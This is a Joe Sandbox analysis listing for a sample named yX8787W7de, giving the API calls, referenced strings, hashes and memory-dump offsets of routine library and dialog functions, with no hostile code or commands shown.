API String ID: 110358324-1360425832
Opcode ID: b251f8ce511ee15e006d3a4b69ec8034444a3081ca1b21429ed0db4576422c94
Instruction ID: 6d3238f2eebe13fc191c2f777a3cb105ecc04eb58155bea86308c9de0480f949
Opcode Fuzzy Hash: b251f8ce511ee15e006d3a4b69ec8034444a3081ca1b21429ed0db4576422c94
Instruction Fuzzy Hash: 8E4162B1900668AADF25DBA0DC45EEE77BCEF14741F4080A6F909E7051EF709A84CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0012BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0012BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0012A275,?,?,00000800,?,0012A23A,?,0012755C), ref: 0012BBC5
_wcslen.LIBCMT ref: 0012BC3B

Strings

\\?\, xrefs: 0012BB52, 0012BB99, 0012BBF7, 0012BC4E
UNC, xrefs: 0012BBA7

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 6201ecb60fa99f1d91cb6100647d0be77d77532aa95e421bccf764c895aa73a2
Instruction ID: 3970c8f3b58f1912de273a137cf541f2c0427b771cb067d0e296dd767759a83d
Opcode Fuzzy Hash: 6201ecb60fa99f1d91cb6100647d0be77d77532aa95e421bccf764c895aa73a2
Instruction Fuzzy Hash: 0241F871408225B6CF22AF60EC82EEF77B9AF54394F044425F864A7151DB70EEB0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0013B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0013B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0013B712
DeleteObject.GDI32(00000000), ref: 0013B744
DeleteObject.GDI32(00000000), ref: 0013B767

Part of subcall function 0013A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0013B73D,00000066), ref: 0013A6D5
Part of subcall function 0013A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0013B73D,00000066), ref: 0013A6EC
Part of subcall function 0013A6C2: LoadResource.KERNEL32(00000000,?,?,?,0013B73D,00000066), ref: 0013A703
Part of subcall function 0013A6C2: LockResource.KERNEL32(00000000,?,?,?,0013B73D,00000066), ref: 0013A712
Part of subcall function 0013A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0013B73D,00000066), ref: 0013A72D
Part of subcall function 0013A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0013B73D,00000066), ref: 0013A73E
Part of subcall function 0013A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0013A7A7
Part of subcall function 0013A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0013A7C6
Part of subcall function 0013A6C2: GlobalFree.KERNEL32(00000000), ref: 0013A7CD

Strings

], xrefs: 0013B71A

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 033f3179a1b8cad2cdb7e6502a23d725e71ecdf33a4696e97700ae1aa7109139
Instruction ID: aa16a5520e91ec5edd2109265718bc9f9de8e901be0213f9e301cc9570c6c228
Opcode Fuzzy Hash: 033f3179a1b8cad2cdb7e6502a23d725e71ecdf33a4696e97700ae1aa7109139
Instruction Fuzzy Hash: 1B01F53694020167CB1277749C4AEBF7ABAEFD0B52F090010FA50B72D1EF75CE4542A2

Uniqueness

Uniqueness Score: -1.00%

Function 0013D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00121316: GetDlgItem.USER32(00000000,00003021), ref: 0012135A
Part of subcall function 00121316: SetWindowTextW.USER32(00000000,001535F4), ref: 00121370

EndDialog.USER32(?,00000001), ref: 0013D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0013D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0013D675
SetDlgItemTextW.USER32(?,00000068), ref: 0013D684

Strings

RENAMEDLG, xrefs: 0013D618

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 75794841850ef77987e250eebd0bad93caf0482d64d1033f5158a5bf6bb86d19
Instruction ID: 234cad06bb69b67a333e93b809dd6ebada173994a2ca3e8d5282019b2b16bd6e
Opcode Fuzzy Hash: 75794841850ef77987e250eebd0bad93caf0482d64d1033f5158a5bf6bb86d19
Instruction Fuzzy Hash: 900128B3244214BBD2114F64BD0BF577B6EFB9AF01F110014F315A64D0C7A29A459775

Uniqueness

Uniqueness Score: -1.00%

Function 00147E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00147E24,00000000,?,00147DC4,00000000,0015C300,0000000C,00147F1B,00000000,00000002), ref: 00147E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00147EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00147E24,00000000,?,00147DC4,00000000,0015C300,0000000C,00147F1B,00000000,00000002), ref: 00147EC9

Strings

CorExitProcess, xrefs: 00147E9E
mscoree.dll, xrefs: 00147E8C

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 49a95c216b3e26f63b81b4b855e74571a880b9acac30804c69e6809146a99416
Instruction ID: 69eae0564e7df05da08e165052fe4ab61ea223ac20f56a93be84809da7ba0bba
Opcode Fuzzy Hash: 49a95c216b3e26f63b81b4b855e74571a880b9acac30804c69e6809146a99416
Instruction Fuzzy Hash: DEF06831904308FFDB119FA0DC09B9EBFB4EF44752F0041A9F815A75A0DB709E84CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0012F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0013081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00130836
Part of subcall function 0013081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0012F2D8,Crypt32.dll,00000000,0012F35C,?,?,0012F33E,?,?,?), ref: 00130858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0012F2E4
GetProcAddress.KERNEL32(001681C8,CryptUnprotectMemory), ref: 0012F2F4

Strings

CryptProtectMemory, xrefs: 0012F2DE
Crypt32.dll, xrefs: 0012F2CE
CryptUnprotectMemory, xrefs: 0012F2EA

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 327612834e32f917dedb58df62c2eafc265da51fa63ea08eccf45777b57a3dc7
Instruction ID: 5f7d1cee55d88a4e036222c969b1130363d3385dda8ec3af624f50066f972020
Opcode Fuzzy Hash: 327612834e32f917dedb58df62c2eafc265da51fa63ea08eccf45777b57a3dc7
Instruction Fuzzy Hash: 35E08671910711DFD7219F38A84DB027AE46F14741F14886DF4FAD7680D7B4D5958B50

Uniqueness

Uniqueness Score: -1.00%

Function 00142BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00142CA1
___AdjustPointer.LIBCMT ref: 00142CC4
_abort.LIBCMT ref: 00142D12
___AdjustPointer.LIBCMT ref: 00142D60

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 959676131e54addbaa3c14c02221a9e8ff5152289ff5e599909530d0e59f4a9d
Instruction ID: 7cad9ca5820f0e9dba54637a1c6ca41ddd9739288b44e45a51a4a15b5b00d51e
Opcode Fuzzy Hash: 959676131e54addbaa3c14c02221a9e8ff5152289ff5e599909530d0e59f4a9d
Instruction Fuzzy Hash: 8A51BE72A00212AFDB298F94D885BBAB7A4FF64310F64412DF906876B1D731EDC0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0014BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0014BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0014BF5C

Part of subcall function 00148E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014CA2C,00000000,?,00146CBE,?,00000008,?,001491E0,?,?,?), ref: 00148E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0014BF82
_free.LIBCMT ref: 0014BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0014BFA4

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 6b8189720db38c8ca944de3868519e5547cf39933d098fd809b49b386cd1ac1f
Instruction ID: 0e46b5b74807efe361c6148003d44fcfdafb9280420fabe4ffb0b343d1fbf13d
Opcode Fuzzy Hash: 6b8189720db38c8ca944de3868519e5547cf39933d098fd809b49b386cd1ac1f
Instruction Fuzzy Hash: 9901F2B2609711BF27211ABA5CCCC7F6A6DEFC2BA13150129F908D7220EF60CD0695B0

Uniqueness

Uniqueness Score: -1.00%

Function 00149869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001491AD,0014B188,?,00149813,00000001,00000364,?,00143F73,00000050,?,00161030,00000200), ref: 0014986E
_free.LIBCMT ref: 001498A3
_free.LIBCMT ref: 001498CA
SetLastError.KERNEL32(00000000,?,00161030,00000200), ref: 001498D7
SetLastError.KERNEL32(00000000,?,00161030,00000200), ref: 001498E0

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 682f6759c8a779a0dc3152d49141687d94da18323c6de67ba6e2353c43798166
Instruction ID: 750b18516dd965107edf41a0f1b158de5b984765210d744aff8389d6faa8edc6
Opcode Fuzzy Hash: 682f6759c8a779a0dc3152d49141687d94da18323c6de67ba6e2353c43798166
Instruction Fuzzy Hash: D901283658570BABC316677C6C8991B256ADFE37B27220134F525A71B2FF30CD025261

Uniqueness

Uniqueness Score: -1.00%

Function 00130EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 001311CF: ResetEvent.KERNEL32(?), ref: 001311E1
Part of subcall function 001311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001311F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00130F21
CloseHandle.KERNEL32(?,?), ref: 00130F3B
DeleteCriticalSection.KERNEL32(?), ref: 00130F54
CloseHandle.KERNEL32(?), ref: 00130F60
CloseHandle.KERNEL32(?), ref: 00130F6C

Part of subcall function 00130FE4: WaitForSingleObject.KERNEL32(?,000000FF,00131206,?), ref: 00130FEA
Part of subcall function 00130FE4: GetLastError.KERNEL32(?), ref: 00130FF6

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 538fc4ffa85a3d6816345d39d78b6f9281218c0bcbdb14480a718ecf86eb8ca2
Instruction ID: c4adf19ea0f12c6e160fa4f4be6ad4cc48014cd4b48ef06075dd03f267c60f5a
Opcode Fuzzy Hash: 538fc4ffa85a3d6816345d39d78b6f9281218c0bcbdb14480a718ecf86eb8ca2
Instruction Fuzzy Hash: 84015E72100B44EFC7229B64DC84BC6BBEAFB08751F000929F26A925A0CB757A94CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0014C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0014C817

Part of subcall function 00148DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?), ref: 00148DE2
Part of subcall function 00148DCC: GetLastError.KERNEL32(?,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?,?), ref: 00148DF4

_free.LIBCMT ref: 0014C829
_free.LIBCMT ref: 0014C83B
_free.LIBCMT ref: 0014C84D
_free.LIBCMT ref: 0014C85F

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 589a74548d15d1edb87376a48273103aedb54d51b4a5a46d07d76022fff271ae
Instruction ID: 37a5078f765aa58a1e709276014d10845e6504e16298cfd9716202d2f0b21ac9
Opcode Fuzzy Hash: 589a74548d15d1edb87376a48273103aedb54d51b4a5a46d07d76022fff271ae
Instruction Fuzzy Hash: FDF01232D16211EB8664DBA8E586C1A73E9EB207157541819F108DB972CF71FD80CA94

Uniqueness

Uniqueness Score: -1.00%

Function 00131FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00131FE5
_wcslen.LIBCMT ref: 00131FF6
_wcslen.LIBCMT ref: 00132006
_wcslen.LIBCMT ref: 00132014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0012B371,?,?,00000000,?,?,?), ref: 0013202F

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: fc12161f02a8645a414d0dca27d278b2264704c5b59c8bfa10432c6aa76dae33
Instruction ID: b6464d8114fe847e1736f57713b2b183013e6557d630cb8d40bf9ea0e3e5581b
Opcode Fuzzy Hash: fc12161f02a8645a414d0dca27d278b2264704c5b59c8bfa10432c6aa76dae33
Instruction Fuzzy Hash: 48F01732008114BBCF266F51EC09DCE7F26EB54B70F218415FA6A6B061CB7296A5DA90

Uniqueness

Uniqueness Score: -1.00%

Function 00148900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0014891E

Part of subcall function 00148DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?), ref: 00148DE2
Part of subcall function 00148DCC: GetLastError.KERNEL32(?,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?,?), ref: 00148DF4

_free.LIBCMT ref: 00148930
_free.LIBCMT ref: 00148943
_free.LIBCMT ref: 00148954
_free.LIBCMT ref: 00148965

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b9e8db65aedddceb9e83859a5edf3ca23c34add8894a31dca4c5997cf3683224
Instruction ID: fa94c4cc16348252e6ed727a63ebd8620130591ba5d0738c1a5e266c0f67fc62
Opcode Fuzzy Hash: b9e8db65aedddceb9e83859a5edf3ca23c34add8894a31dca4c5997cf3683224
Instruction Fuzzy Hash: F0F0DA71C11622DB864B6F54FC0241D3BE2FB247253110506F91497AB1DB724BC19B81

Uniqueness

Uniqueness Score: -1.00%

Function 001315FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 001317BC
_swprintf.LIBCMT ref: 0013186B

Strings

%s: %s, xrefs: 001317CB
%ls, xrefs: 00131641, 00131657

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 36e18116fe8284c6658a617ae35ac759a75f38fe9b7dd9708dc00e39d92ed476
Instruction ID: 1391e2e31d5162aac2f60ecf8364cccd32887427b02a3e6d916942f1b1a8a884
Opcode Fuzzy Hash: 36e18116fe8284c6658a617ae35ac759a75f38fe9b7dd9708dc00e39d92ed476
Instruction Fuzzy Hash: 28510A75288300F6F7291AE08D47F357265BB15B04F298546F396784E1DBF2A460A71F

Uniqueness

Uniqueness Score: -1.00%

Function 001431D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001431FB
_abort.LIBCMT ref: 00143306

Strings

RCC, xrefs: 00143215
MOC, xrefs: 0014320D

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 427678615d2f76aec92622a75758f0f84c936f7a057b0ee64b1ba7d5ee26b2f8
Instruction ID: f2704bd5b4e9702334498f0af931a269fc1165478bbafdd6a885920ecf8d7960
Opcode Fuzzy Hash: 427678615d2f76aec92622a75758f0f84c936f7a057b0ee64b1ba7d5ee26b2f8
Instruction Fuzzy Hash: 22416A71900209AFCF15DF94CD82EEEBBB5BF48314F148059F92467222D375AA90DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00127401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00127406

Part of subcall function 00123BBA: __EH_prolog.LIBCMT ref: 00123BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 001274CD

Part of subcall function 00127A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00127AAB
Part of subcall function 00127A9C: GetLastError.KERNEL32 ref: 00127AF1
Part of subcall function 00127A9C: CloseHandle.KERNEL32(?), ref: 00127B00

Strings

SeRestorePrivilege, xrefs: 00127460
SeSecurityPrivilege, xrefs: 0012744B

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
